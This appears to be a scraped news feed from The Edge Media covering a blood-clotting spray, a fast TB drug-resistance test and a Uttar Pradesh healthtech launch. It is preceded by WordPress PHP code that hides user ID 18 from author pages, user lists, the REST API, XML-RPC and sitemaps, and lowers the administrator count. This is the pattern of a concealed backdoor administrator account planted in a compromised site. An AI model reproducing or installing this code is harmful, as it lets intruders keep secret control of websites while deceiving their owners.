add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Spray on the Wound, Bleeding Stops Instantly appeared first on The Edge Media.
]]>Excessive bleeding remains one of the leading causes of death in accidents and traumatic injuries. In many cases, patients lose a significant amount of blood before reaching a hospital, making survival difficult. The first few minutes after an injury are often critical for saving lives. Keeping this in mind, researchers at the Korea Advanced Institute of Science and Technology have created a high tech hemostatic agent in powder form.
As soon as the powder comes into contact with blood, it transforms in less than a second into a soft and flexible gel. This gel adapts to the shape of the wound and seals it effectively. Whether the injury is deep, uneven, or located in a place where bandaging is difficult, the gel forms a complete seal over the area.
The spray does not merely cover the wound. It helps blood cells bind together quickly, accelerating the body’s natural clotting process. This rapid action ensures that bleeding is controlled almost immediately. The gel also has the ability to absorb several times its own weight in blood, making it highly efficient in critical situations.
The materials used to create this spray are derived from natural sources. Marine algae play a key role in forming the gel structure. A bacterial fermentation process is also involved, which strengthens the mixture and enhances its effectiveness.
According to the researchers, the project initially began with the aim of saving soldiers’ lives on the battlefield. However, they believe the spray will soon become an essential part of military medical kits, emergency response units, and even household first aid boxes. The technology is currently in the final stages of development. Although an official launch date has not yet been announced, experts expect it to become an affordable and practical life saving solution for millions of people around the world in the coming years.
The post Spray on the Wound, Bleeding Stops Instantly appeared first on The Edge Media.
]]>The post Now TB Medicine Effectiveness Can Be Tested in Just Two Hours appeared first on The Edge Media.
]]>Until now, patients had to wait several weeks to know whether the prescribed medicines were working, as traditional culture based drug sensitivity tests took a long time. This delay often resulted in incorrect treatment, worsening patient conditions, and an increased risk of drug resistant tuberculosis spreading in the community.
The new POCT method enables doctors to quickly determine whether TB bacteria are responding to antibiotics and anti TB medicines. This allows timely correction of treatment, prevents unnecessary medication, and reduces the chances of complications caused by ineffective drugs.
The research was conducted under the leadership of Dr Arup Mohanty at AIIMS Gorakhpur. The team studied Mycobacterium tuberculosis and extensively drug resistant TB strains using this new technique. Patient samples were analysed, and results were obtained within two hours, compared to several weeks required for conventional tests.
The findings of this study were presented at the 14th annual conference of the Sri Lanka Society for Microbiology, held in Colombo. Researchers and TB specialists from India and other countries participated in the conference. Only 18 research papers were selected for presentation, and this study was among them, highlighting its global relevance and scientific value.
Experts stated that the new test is highly useful for detecting multi drug resistant and extensively drug resistant tuberculosis. AIIMS Gorakhpur is preparing to implement this test in clinical practice soon, which is expected to significantly improve TB diagnosis and treatment outcomes.
According to Dr Bimla Dutta, Director of AIIMS Gorakhpur, this innovation will help identify TB drug resistance in a much shorter time and ensure that patients receive the correct medicines without delay.
The post Now TB Medicine Effectiveness Can Be Tested in Just Two Hours appeared first on The Edge Media.
]]>The post UP to Emerge as India’s Premier Hub for Medical Services and Healthtech: CM Yogi appeared first on The Edge Media.
]]>During the event, the Chief Minister launched the UP Healthtech Medical Research Application Software. This digital platform is designed to bring transparency and efficiency to clinical trials and pharmaceutical research. Additionally, he released a Standard Operating Procedure (SOP) booklet containing 22 protocols for Institutional Ethics Committees to standardize research across the state.
The post UP to Emerge as India’s Premier Hub for Medical Services and Healthtech: CM Yogi appeared first on The Edge Media.
]]>